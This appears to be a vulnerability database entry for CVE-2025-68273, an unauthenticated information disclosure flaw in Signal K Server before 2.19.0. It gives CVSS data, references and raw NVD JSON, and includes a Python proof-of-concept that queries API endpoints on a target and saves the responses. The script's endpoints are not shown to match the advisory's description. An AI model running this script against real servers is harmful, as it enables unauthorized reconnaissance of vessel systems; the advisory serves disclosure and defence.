CVE-2025-68273

Description

Signal K Server is a server application that runs on a central hub in a boat. An unauthenticated information disclosure vulnerability in versions prior to 2.19.0 allows any user to retrieve sensitive system information, including the full SignalK data schema, connected serial devices, and installed analyzer tools. This exposure facilitates reconnaissance for further attacks. Version 2.19.0 patches the issue.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:signalk:signal_k_server:*:*:*:*:*:*:*:* - VULNERABLE

Signal K Server < 2.19.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-68273 PoC - Signal K Server Information Disclosure
# Affected Version: < 2.19.0

import requests
import json

target = "http://target-server:3000"  # Replace with actual target

def check_version():
    """Check if target is vulnerable by checking version endpoint"""
    try:
        response = requests.get(f"{target}/signalk/v1/api/version", timeout=10)
        if response.status_code == 200:
            version_info = response.json()
            version = version_info.get('version', 'unknown')
            print(f"[+] Detected Signal K Server version: {version}")
            return version
    except Exception as e:
        print(f"[-] Error checking version: {e}")
    return None

def exploit_information_disclosure():
    """Exploit CVE-2025-68273 to gather sensitive information"""
    print("\n[*] Starting information disclosure attack...")
    
    endpoints = [
        ("/signalk/v1/api/", "Full API Schema"),
        ("/signalk/v1/api/security/devices", "Connected Serial Devices"),
        ("/signalk/v1/api/plugins", "Installed Plugins"),
        ("/signalk/v1/api/serverInfo", "Server Configuration"),
        ("/signalk/v1/api/vessels/self", "Vessel Data")
    ]
    
    results = {}
    for endpoint, description in endpoints:
        try:
            response = requests.get(f"{target}{endpoint}", timeout=10)
            if response.status_code == 200:
                print(f"[+] {description}: Retrieved successfully")
                results[description] = response.json()
            else:
                print(f"[-] {description}: HTTP {response.status_code}")
        except Exception as e:
            print(f"[-] {description}: {str(e)}")
    
    return results

if __name__ == "__main__":
    print("CVE-2025-68273 PoC - Signal K Server Information Disclosure\n")
    version = check_version()
    if version:
        results = exploit_information_disclosure()
        if results:
            print(f"\n[+] Successfully extracted {len(results)} sensitive data sources")
            # Save results for further analysis
            with open('cve_2025_68273_results.json', 'w') as f:
                json.dump(results, f, indent=2)
            print("[+] Results saved to cve_2025_68273_results.json")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-68273
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-68273
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-68273/
[4] VulDB https://vuldb.com/cve/CVE-2025-68273
[5] https://github.com/SignalK/signalk-server/releases/tag/v2.19.0
[6] https://github.com/SignalK/signalk-server/security/advisories/GHSA-fpf5-w967-rr2m

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-68273", "sourceIdentifier": "[email protected]", "published": "2026-01-01T19:15:53.630", "lastModified": "2026-01-06T17:58:57.153", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Signal K Server is a server application that runs on a central hub in a boat. An unauthenticated information disclosure vulnerability in versions prior to 2.19.0 allows any user to retrieve sensitive system information, including the full SignalK data schema, connected serial devices, and installed analyzer tools. This exposure facilitates reconnaissance for further attacks. Version 2.19.0 patches the issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:signalk:signal_k_server:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.19.0", "matchCriteriaId": "102A9593-CCDC-4532-8201-E67EEFC665E0"}]}]}], "references": [{"url": "https://github.com/SignalK/signalk-server/releases/tag/v2.19.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-fpf5-w967-rr2m", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}